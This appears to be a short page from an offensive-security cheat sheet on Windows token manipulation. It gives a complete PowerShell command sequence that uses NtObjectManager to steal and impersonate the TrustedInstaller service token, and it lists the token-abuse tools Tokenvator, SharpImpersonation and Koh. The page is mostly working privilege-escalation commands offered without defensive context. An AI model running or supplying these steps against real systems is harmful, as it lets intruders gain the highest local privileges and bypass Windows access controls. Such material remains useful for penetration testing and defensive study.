Token Manipulation

Trusted Installer Token

PS > Install-Module -Name NtObjectManager -Confirm:$false
PS > Restart-Service TrustedInstaller
PS > $procId = (Get-Process TrustedInstaller).Id
PS > $token = Get-NtTokenFromProcess -ProcessId $procId
PS > $current = Get-NtThread -Current -PseudoHandle
PS > $ctx = $current.Impersonate($token)
PS > $impToken = Get-NtToken -Impersonation
PS > $impToken.Groups

Tools

Tokenvator

SharpImpersonation

Koh

Last modified 27d ago